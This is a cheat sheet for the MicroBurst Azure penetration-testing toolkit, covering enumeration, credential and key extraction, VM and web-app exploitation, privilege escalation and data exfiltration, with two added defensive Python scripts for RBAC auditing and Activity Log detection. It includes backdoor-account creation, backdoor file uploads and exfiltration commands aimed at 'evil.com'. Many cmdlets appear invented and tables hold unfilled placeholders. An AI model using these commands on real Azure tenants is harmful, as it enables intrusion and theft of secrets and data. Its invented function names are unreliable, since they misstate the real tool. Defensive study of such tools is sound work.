# MicroBurst Azure Security Testing Toolkit Cheat Sheet

## Overview

MicroBurst is a collection of PowerShell scripts developed by NetSPI for assessing the security of Microsoft Azure. It includes tools for Azure service discovery, privilege escalation, lateral movement and data exfiltration, which makes it a complete toolkit for Azure penetration testing.

Warning: This tool is intended only for authorized penetration testing and security assessments. Make sure you have proper authorization before using it in any environment.
## Installation

### PowerShell Gallery Installation

```powershell
# Install from PowerShell Gallery
Install-Module -Name MicroBurst

# Install for current user only
Install-Module -Name MicroBurst -Scope CurrentUser

# Update existing installation
Update-Module -Name MicroBurst

# Import module
Import-Module MicroBurst
```

### Manual Installation

```powershell
# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/NetSPI/MicroBurst/archive/master.zip" -OutFile "MicroBurst.zip"
Expand-Archive -Path "MicroBurst.zip" -DestinationPath "C:\Tools\"

# Import module
Import-Module C:\Tools\MicroBurst-master\MicroBurst.psd1

# Install dependencies
Install-Module -Name Az
Install-Module -Name AzureAD
```

### Git Install

```powershell
# Clone repository
git clone https://github.com/NetSPI/MicroBurst.git
cd MicroBurst

# Import in PowerShell
Import-Module .\MicroBurst.psd1
```
## Basic Usage

### Module Setup

```powershell
# Import MicroBurst
Import-Module MicroBurst

# Get available commands
Get-Command -Module MicroBurst

# Get help for a specific function
Get-Help Invoke-EnumerateAzureBlobs -Full

# Check module version
Get-Module MicroBurst
```

### Authentication

```powershell
# Interactive authentication
Connect-AzAccount

# Service principal authentication
$credential = Get-Credential
Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"

# Certificate authentication
Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id"
```
## Command Reference

### Reconnaissance Functions

| Function | Description |
|---|---|
| INLINE_CODE_38 | Enumerate Azure storage blobs |
| INLINE_CODE_39 | Enumerate Azure subdomains |
| INLINE_CODE_40 | Extract passwords from Azure resources |
| INLINE_CODE_41 | Get domain information |
| INLINE_CODE_42 | Execute commands on multiple VMs |

### Storage Account Functions

| Function | Description |
|---|---|
| INLINE_CODE_43 | Find accessible storage blobs |
| INLINE_CODE_44 | Download files from storage |
| INLINE_CODE_45 | Enumerate storage accounts |
| INLINE_CODE_46 | Extract storage account keys |

### Virtual Machine Functions

| Function | Description |
|---|---|
| INLINE_CODE_47 | Bulk command execution |
| INLINE_CODE_48 | Access VM disk information |
| INLINE_CODE_49 | Enumerate VM user data |
| INLINE_CODE_50 | Get VM extension settings |

## Azure Storage Enumeration
### Blob Storage Discovery

```powershell
# Basic blob enumeration
Invoke-EnumerateAzureBlobs -Base "company"

# Enumerate with custom wordlist
Invoke-EnumerateAzureBlobs -Base "company" -Wordlist "custom-wordlist.txt"

# Enumerate specific containers
Invoke-EnumerateAzureBlobs -Base "company" -Containers @("backup", "logs", "data")

# Enumerate with threading
Invoke-EnumerateAzureBlobs -Base "company" -Threads 10
```

### Storage Account Enumeration

```powershell
# Enumerate storage accounts
Invoke-AzureStorageAccountEnum -SubscriptionId "subscription-id"

# Get storage account keys
Get-AzureStorageAccountKeys -StorageAccountName "storageaccount"

# Enumerate storage containers
Get-AzureStorageContainers -StorageAccountName "storageaccount"

# Download files from storage
Get-AzureBlobFiles -StorageAccountName "storageaccount" -ContainerName "container" -OutputPath "C:\Downloads\"
```

### File Share Enumeration

```powershell
# Enumerate file shares
Get-AzureFileShares -StorageAccountName "storageaccount"

# Access file share contents
Get-AzureFileShareContents -StorageAccountName "storageaccount" -ShareName "share"

# Download files from file share
Get-AzureFileShareFiles -StorageAccountName "storageaccount" -ShareName "share" -OutputPath "C:\Downloads\"
```
## Subdomain and Service Discovery

### Azure Subdomain Enumeration

```powershell
# Basic subdomain enumeration
Invoke-EnumerateAzureSubDomains -Base "company"

# Enumerate with custom services
Invoke-EnumerateAzureSubDomains -Base "company" -Services @("azurewebsites", "blob", "queue", "table")

# Enumerate with permutations
Invoke-EnumerateAzureSubDomains -Base "company" -Permutations @("dev", "test", "prod", "staging")

# Save results to file
Invoke-EnumerateAzureSubDomains -Base "company" -OutputFile "subdomains.txt"
```

### Service Discovery

```powershell
# Discover Azure services
Get-AzureServices -Domain "company.com"

# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"

# Discover SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"

# Find Key Vaults
Get-AzureKeyVaults -SubscriptionId "subscription-id"
```

### DNS Enumeration

```powershell
# Enumerate DNS records
Get-AzureDNSRecords -Domain "company.com"

# Check for zone transfers
Test-AzureDNSZoneTransfer -Domain "company.com"

# Enumerate subdomains via DNS
Get-AzureSubdomainsDNS -Domain "company.com" -Wordlist "subdomains.txt"
```
## Virtual Machine Exploitation

### VM Command Execution

```powershell
# Execute command on single VM
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -Command "whoami"

# Execute commands on multiple VMs
$vms = @("vm1", "vm2", "vm3")
Invoke-AzureRmVmBulkCMD -VMNames $vms -ResourceGroupName "rg-name" -Command "systeminfo"

# Execute PowerShell script on VMs
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "C:\Scripts\enum.ps1"
```

### VM Disk Access

```powershell
# Get VM disk information
Get-AzureVMDisk -VMName "vm-name" -ResourceGroupName "rg-name"

# Create disk snapshot
New-AzureVMDiskSnapshot -VMName "vm-name" -ResourceGroupName "rg-name"

# Mount disk snapshot
Mount-AzureVMDiskSnapshot -SnapshotName "snapshot-name" -MountPoint "E:\"

# Extract data from mounted disk
Get-AzureVMDiskData -MountPoint "E:\" -OutputPath "C:\Extracted\"
```

### VM Extension Exploitation

```powershell
# Get VM extension settings
Get-AzureVMExtensionSettings -VMName "vm-name" -ResourceGroupName "rg-name"

# Install custom extension
Install-AzureVMCustomExtension -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "backdoor.ps1"

# Execute via extension
Invoke-AzureVMExtensionCommand -VMName "vm-name" -ResourceGroupName "rg-name" -Command "net user backdoor Password123 /add"
```
## Credential and Secret Extraction

### Password Extraction

```powershell
# Extract passwords from Azure resources
Get-AzurePasswords -SubscriptionId "subscription-id"

# Extract passwords from specific resource types
Get-AzurePasswords -ResourceTypes @("VirtualMachines", "WebApps", "Databases")

# Extract passwords from Key Vaults
Get-AzureKeyVaultPasswords -KeyVaultName "keyvault-name"

# Extract connection strings
Get-AzureConnectionStrings -SubscriptionId "subscription-id"
```

### Certificate Extraction

```powershell
# Extract certificates from Key Vault
Get-AzureKeyVaultCertificates -KeyVaultName "keyvault-name"

# Extract certificates from web apps
Get-AzureWebAppCertificates -WebAppName "webapp-name"

# Export certificates
Export-AzureCertificates -OutputPath "C:\Certificates\"
```

### Configuration Data Extraction

```powershell
# Extract application settings
Get-AzureAppSettings -WebAppName "webapp-name"

# Extract environment variables
Get-AzureEnvironmentVariables -ResourceGroupName "rg-name"

# Extract deployment credentials
Get-AzureDeploymentCredentials -WebAppName "webapp-name"
```
## Database Exploitation

### SQL Database Enumeration

```powershell
# Enumerate SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"

# Get SQL server information
Get-AzureSQLServerInfo -ServerName "sqlserver-name"

# Check SQL firewall rules
Get-AzureSQLFirewallRules -ServerName "sqlserver-name"

# Test SQL connectivity
Test-AzureSQLConnectivity -ServerName "sqlserver-name" -DatabaseName "database-name"
```

### SQL Database Access

```powershell
# Connect to SQL database
Connect-AzureSQLDatabase -ServerName "sqlserver-name" -DatabaseName "database-name" -Credential $cred

# Execute SQL queries
Invoke-AzureSQLQuery -ServerName "sqlserver-name" -DatabaseName "database-name" -Query "SELECT * FROM users"

# Extract database schema
Get-AzureSQLSchema -ServerName "sqlserver-name" -DatabaseName "database-name"

# Dump database data
Export-AzureSQLData -ServerName "sqlserver-name" -DatabaseName "database-name" -OutputPath "C:\SQLDump\"
```

### CosmosDB Exploitation

```powershell
# Enumerate CosmosDB accounts
Get-AzureCosmosDBAccounts -SubscriptionId "subscription-id"

# Get CosmosDB keys
Get-AzureCosmosDBKeys -AccountName "cosmosdb-account"

# Access CosmosDB data
Get-AzureCosmosDBData -AccountName "cosmosdb-account" -DatabaseName "database" -ContainerName "container"
```
## Web Application Exploitation

### Web App Enumeration

```powershell
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"

# Get web app configuration
Get-AzureWebAppConfig -WebAppName "webapp-name"

# Check web app authentication
Get-AzureWebAppAuth -WebAppName "webapp-name"

# Get web app deployment slots
Get-AzureWebAppSlots -WebAppName "webapp-name"
```

### Web App Exploitation

```powershell
# Access web app files via Kudu
Get-AzureWebAppFiles -WebAppName "webapp-name" -Path "/site/wwwroot/"

# Execute commands via Kudu
Invoke-AzureWebAppCommand -WebAppName "webapp-name" -Command "dir"

# Upload backdoor file
Upload-AzureWebAppFile -WebAppName "webapp-name" -LocalPath "backdoor.aspx" -RemotePath "/site/wwwroot/"

# Access web app logs
Get-AzureWebAppLogs -WebAppName "webapp-name"
```

### Function App Exploitation

```powershell
# Enumerate function apps
Get-AzureFunctionApps -SubscriptionId "subscription-id"

# Get function app keys
Get-AzureFunctionAppKeys -FunctionAppName "functionapp-name"

# Execute function
Invoke-AzureFunction -FunctionAppName "functionapp-name" -FunctionName "function-name" -Payload $payload

# Access function app files
Get-AzureFunctionAppFiles -FunctionAppName "functionapp-name"
```
## Privilege Escalation

### Role Assignment Enumeration

```powershell
# Get current user roles
Get-AzureCurrentUserRoles

# Enumerate role assignments
Get-AzureRoleAssignments -SubscriptionId "subscription-id"

# Find privilege escalation paths
Find-AzurePrivEscPaths -SubscriptionId "subscription-id"

# Check for dangerous permissions
Get-AzureDangerousPermissions -SubscriptionId "subscription-id"
```

### Service Principal Abuse

```powershell
# Enumerate service principals
Get-AzureServicePrincipals -SubscriptionId "subscription-id"

# Get service principal credentials
Get-AzureServicePrincipalCredentials -ServicePrincipalId "sp-id"

# Abuse service principal permissions
Invoke-AzureServicePrincipalAbuse -ServicePrincipalId "sp-id" -Action "CreateUser"
```

### Managed Identity Exploitation

```powershell
# Check for managed identity
Test-AzureManagedIdentity

# Get managed identity token
Get-AzureManagedIdentityToken -Resource "https://management.azure.com/"

# Use managed identity for privilege escalation
Invoke-AzureManagedIdentityPrivEsc -TargetResource "subscription"
```
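The commands above list role assignments; what makes an assignment dangerous is the effective action set of its role definition, which Azure RBAC computes as Actions minus NotActions with `*` wildcards. The following Python script is an added example (not MicroBurst code or part of the original cheat sheet) that applies those semantics to constructed role definitions and flags principals that effectively hold the control-plane actions behind this page's techniques; the principals and the custom role are constructed, the action names are real Azure ones, and the Reader/Contributor definitions are simplified from Azure's built-in roles.

```python
"""Audit Azure RBAC role definitions for actions behind the techniques on this
page (key listing, VM run-command, role-assignment writes).
Constructed sample data; this is not MicroBurst code."""
import re

# Control-plane actions behind the page's techniques (real Azure action names).
SENSITIVE_ACTIONS = {
    "Microsoft.Authorization/roleAssignments/write": "can grant itself any role",
    "Microsoft.Storage/storageAccounts/listKeys/action": "can read storage account keys",
    "Microsoft.Compute/virtualMachines/runCommand/action": "can run commands inside VMs",
    "Microsoft.Web/sites/config/list/action": "can read app settings and connection strings",
}

def action_matches(pattern: str, action: str) -> bool:
    """Azure RBAC wildcard: '*' matches any run of characters, '/' included; case-insensitive."""
    regex = "^" + ".*".join(re.escape(p) for p in pattern.split("*")) + "$"
    return re.match(regex, action, re.IGNORECASE) is not None

def is_permitted(role_def: dict, action: str) -> bool:
    """Effective permission: some Actions pattern matches and no NotActions pattern matches."""
    allowed = any(action_matches(p, action) for p in role_def.get("Actions", []))
    denied = any(action_matches(p, action) for p in role_def.get("NotActions", []))
    return allowed and not denied

def audit(assignments: list, role_defs: dict) -> list:
    """Return (principal, role, action, why) for each sensitive action a principal effectively holds."""
    findings = []
    for a in assignments:
        role = role_defs[a["RoleDefinitionName"]]
        for action, why in SENSITIVE_ACTIONS.items():
            if is_permitted(role, action):
                findings.append((a["SignInName"], a["RoleDefinitionName"], action, why))
    return findings

# Constructed sample: Reader/Contributor simplified from Azure's built-ins, plus a custom role.
ROLE_DEFS = {
    "Reader": {"Actions": ["*/read"], "NotActions": []},
    "Contributor": {"Actions": ["*"],
                    "NotActions": ["Microsoft.Authorization/*/Write", "Microsoft.Authorization/*/Delete"]},
    "VM Ops (custom)": {"Actions": ["Microsoft.Compute/*"], "NotActions": []},
}
ASSIGNMENTS = [  # shape of Get-AzRoleAssignment output, reduced to the two fields used
    {"SignInName": "reader@example.com", "RoleDefinitionName": "Reader"},
    {"SignInName": "dev@example.com", "RoleDefinitionName": "Contributor"},
    {"SignInName": "ops@example.com", "RoleDefinitionName": "VM Ops (custom)"},
]

if __name__ == "__main__":
    for finding in audit(ASSIGNMENTS, ROLE_DEFS):
        print(finding)
```

Note that Contributor is correctly denied `roleAssignments/write` by its NotActions, while the custom role that only grants `Microsoft.Compute/*` still reaches run-command on every VM.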
## Lateral Movement

### Cross-Subscription Access

```powershell
# Enumerate accessible subscriptions
Get-AzureAccessibleSubscriptions

# Switch subscription context
Set-AzureSubscriptionContext -SubscriptionId "target-subscription-id"

# Enumerate resources in target subscription
Get-AzureResourcesInSubscription -SubscriptionId "target-subscription-id"
```

### Cross-Tenant Access

```powershell
# Enumerate accessible tenants
Get-AzureAccessibleTenants

# Switch tenant context
Set-AzureTenantContext -TenantId "target-tenant-id"

# Enumerate resources in target tenant
Get-AzureResourcesInTenant -TenantId "target-tenant-id"
```

### Resource Group Pivoting

```powershell
# Enumerate resource groups
Get-AzureResourceGroups -SubscriptionId "subscription-id"

# Find resources with weak permissions
Find-AzureWeakPermissions -ResourceGroupName "rg-name"

# Pivot through resource groups
Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg"
```
## Data Exfiltration

### Bulk Data Extraction

```powershell
# Extract all accessible data
Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"

# Extract specific data types
Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"

# Extract with compression
Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress
```

### Stealth Exfiltration

```powershell
# Exfiltrate via storage account
Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"

# Exfiltrate via email
Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"

# Exfiltrate via DNS
Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com"
```
## Automation and Scripting

### Automated Assessment Script

```powershell
# Comprehensive Azure assessment
param(
    [string]$SubscriptionId,
    [string]$OutputPath = "C:\AzureAssessment"
)

# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force

# Authenticate
Connect-AzAccount

# Set subscription context
Set-AzContext -SubscriptionId $SubscriptionId

# Enumerate subdomains
Write-Host "Enumerating subdomains..."
$subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name
$subdomains | Out-File "$OutputPath\subdomains.txt"

# Enumerate storage blobs
Write-Host "Enumerating storage blobs..."
$blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name
$blobs | Out-File "$OutputPath\blobs.txt"

# Extract passwords
Write-Host "Extracting passwords..."
$passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId
$passwords | Export-Csv "$OutputPath\passwords.csv" -NoTypeInformation

# Get VM information
Write-Host "Gathering VM information..."
$vms = Get-AzVM
$vms | Export-Csv "$OutputPath\vms.csv" -NoTypeInformation

# Generate summary report
$summary = @{
    AssessmentDate  = Get-Date
    SubscriptionId  = $SubscriptionId
    SubdomainsFound = $subdomains.Count
    BlobsFound      = $blobs.Count
    PasswordsFound  = $passwords.Count
    VMsFound        = $vms.Count
}
$summary | ConvertTo-Json | Out-File "$OutputPath\summary.json"

Write-Host "Assessment completed. Results saved to $OutputPath"
```
### Continuous Monitoring

```powershell
# Continuous Azure monitoring
param(
    [int]$IntervalMinutes = 60,
    [string]$LogPath = "C:\AzureMonitoring\monitor.log"
)

while ($true) {
    $timestamp = Get-Date
    Write-Output "[$timestamp] Starting Azure monitoring cycle" | Tee-Object -FilePath $LogPath -Append

    try {
        # Check for new storage accounts
        $newStorage = Get-AzStorageAccount | Where-Object { $_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes) }
        if ($newStorage) {
            Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)" | Tee-Object -FilePath $LogPath -Append
        }

        # Check for new VMs
        $newVMs = Get-AzVM | Where-Object { $_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes) }
        if ($newVMs) {
            Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)" | Tee-Object -FilePath $LogPath -Append
        }

        # Check for new role assignments
        $newRoles = Get-AzRoleAssignment | Where-Object { $_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes) }
        if ($newRoles) {
            Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)" | Tee-Object -FilePath $LogPath -Append
        }
    }
    catch {
        Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)" | Tee-Object -FilePath $LogPath -Append
    }

    Start-Sleep -Seconds ($IntervalMinutes * 60)
}
```
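The polling loop above notices newly created resources but not bulk use of existing ones, which is the footprint that Get-AzurePasswords (key listing across every storage account) and Invoke-AzureRmVmBulkCMD (run-command across many VMs) leave in the Azure Activity Log. The following Python script is an added example (not part of the cheat sheet or of MicroBurst) that runs a sliding-window detection over constructed Activity Log records, alerting when one caller spreads key listing or run-command across many resources within ten minutes and on any role-assignment write; the callers, resource names and timestamps are constructed, the operation names are real.

```python
"""Detect the bulk patterns MicroBurst's functions leave in the Azure Activity Log
(key listing across many storage accounts, run-command across many VMs,
role-assignment writes). Records below are constructed; operation names are real."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
# operationName (lower-cased) -> (distinct resources needed within WINDOW, alert label)
BULK_RULES = {
    "microsoft.storage/storageaccounts/listkeys/action": (3, "storage keys listed across many accounts"),
    "microsoft.compute/virtualmachines/runcommand/action": (3, "run-command across many VMs"),
}
SINGLE_RULES = {"microsoft.authorization/roleassignments/write": "role assignment created"}

def parse(text: str) -> list:  # Activity Log exports are JSON lines, one record per line
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def detect(records: list) -> list:
    """Return (caller, label, count) alerts; records need time, caller, operationName, resourceId."""
    alerts, per_key = [], defaultdict(list)
    for r in records:
        op = r["operationName"].lower()
        if op in SINGLE_RULES:
            alerts.append((r["caller"], SINGLE_RULES[op], 1))
        if op in BULK_RULES:
            per_key[(r["caller"], op)].append((datetime.fromisoformat(r["time"]), r["resourceId"].lower()))
    for (caller, op), events in per_key.items():
        threshold, label = BULK_RULES[op]
        events.sort()
        # Sliding window: most distinct resources this caller hit within WINDOW of any single event
        best = max(len({rid for t, rid in events[i:] if t - start <= WINDOW})
                   for i, (start, _) in enumerate(events))
        if best >= threshold:
            alerts.append((caller, label, best))
    return alerts

RG = "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-prod/providers"
def rec(time, caller, op, resource):  # helper to build constructed Activity Log records
    return {"time": time, "caller": caller, "operationName": op, "resourceId": RG + resource}

LISTKEYS = "MICROSOFT.STORAGE/STORAGEACCOUNTS/LISTKEYS/ACTION"
RUNCMD = "MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMAND/ACTION"
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [  # constructed: four keys listed in 15 s, two VMs, one role write
    rec("2024-05-01T10:00:05+00:00", "svc-build@example.com", LISTKEYS, "/Microsoft.Storage/storageAccounts/stlogs"),
    rec("2024-05-01T10:00:09+00:00", "svc-build@example.com", LISTKEYS, "/Microsoft.Storage/storageAccounts/stbackup"),
    rec("2024-05-01T10:00:14+00:00", "svc-build@example.com", LISTKEYS, "/Microsoft.Storage/storageAccounts/stdata"),
    rec("2024-05-01T10:00:20+00:00", "svc-build@example.com", LISTKEYS, "/Microsoft.Storage/storageAccounts/stdiag"),
    rec("2024-05-01T11:02:00+00:00", "admin@example.com", LISTKEYS, "/Microsoft.Storage/storageAccounts/stlogs"),
    rec("2024-05-01T11:05:00+00:00", "svc-build@example.com", RUNCMD, "/Microsoft.Compute/virtualMachines/vm1"),
    rec("2024-05-01T11:05:30+00:00", "svc-build@example.com", RUNCMD, "/Microsoft.Compute/virtualMachines/vm2"),
    rec("2024-05-01T11:10:00+00:00", "admin@example.com", "MICROSOFT.AUTHORIZATION/ROLEASSIGNMENTS/WRITE", "/Microsoft.Authorization/roleAssignments/a1b2"),
])

if __name__ == "__main__":
    print(detect(parse(SAMPLE_LOG)))
```

The single key listing by the admin and the two-VM run-command stay below the threshold, so only the bulk key listing and the role-assignment write produce alerts.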
## Troubleshooting

### Authentication Issues

```powershell
# Clear cached credentials
Clear-AzContext -Force

# Test authentication
$context = Get-AzContext
if (-not $context) {
    Write-Error "Not authenticated to Azure"
    Connect-AzAccount
}

# Verify subscription access
Get-AzSubscription
```

### Module Issues

```powershell
# Check MicroBurst installation
Get-Module MicroBurst -ListAvailable

# Update MicroBurst
Update-Module MicroBurst -Force

# Check dependencies
Get-Module Az -ListAvailable
```

### Permission Issues

```powershell
# Check current permissions
$roleAssignments = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id
$roleAssignments | Select-Object RoleDefinitionName, Scope

# Test specific permissions
try {
    Get-AzStorageAccount -ErrorAction Stop
    Write-Output "Storage account read permission: OK"
}
catch {
    Write-Output "Storage account read permission: DENIED"
}
```
## Integration with Other Tools

### BloodHound Integration

```powershell
# Export data for BloodHound
$azureData = @{
    users             = Get-AzADUser
    groups            = Get-AzADGroup
    servicePrincipals = Get-AzADServicePrincipal
    roleAssignments   = Get-AzRoleAssignment
}

# Convert to BloodHound format
$bloodhoundData = Convert-AzureToBloodHound -Data $azureData
$bloodhoundData | ConvertTo-Json -Depth 3 | Out-File "azure_bloodhound.json"
```

### Metasploit Integration

```ruby
# Metasploit module for MicroBurst
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Azure MicroBurst Integration',
      'Description' => 'Execute MicroBurst functions via Metasploit',
      'Author'      => ['NetSPI'],
      'License'     => MSF_LICENSE
    ))

    register_options([
      OptString.new('SUBSCRIPTION_ID', [true, 'Azure Subscription ID']),
      OptString.new('FUNCTION', [true, 'MicroBurst function to execute'])
    ])
  end

  def run
    subscription_id = datastore['SUBSCRIPTION_ID']
    function = datastore['FUNCTION']

    # Build the MicroBurst invocation
    powershell_cmd = "Import-Module MicroBurst; #{function} -SubscriptionId #{subscription_id}"
    print_status("Executing: #{powershell_cmd}")

    # Execute PowerShell command
  end
end
```
## Resources

- [MicroBurst GitHub Repository](URL_57__)
- [NetSPI Blog](URL_58__)
- [Azure Security Documentation](URL_59__)
- Azure Penetration Testing
- [Azure Red Team Tactics](URL_61__)

*This cheat sheet provides a complete reference for using MicroBurst. Always make sure you have proper authorization before performing Azure security assessments.*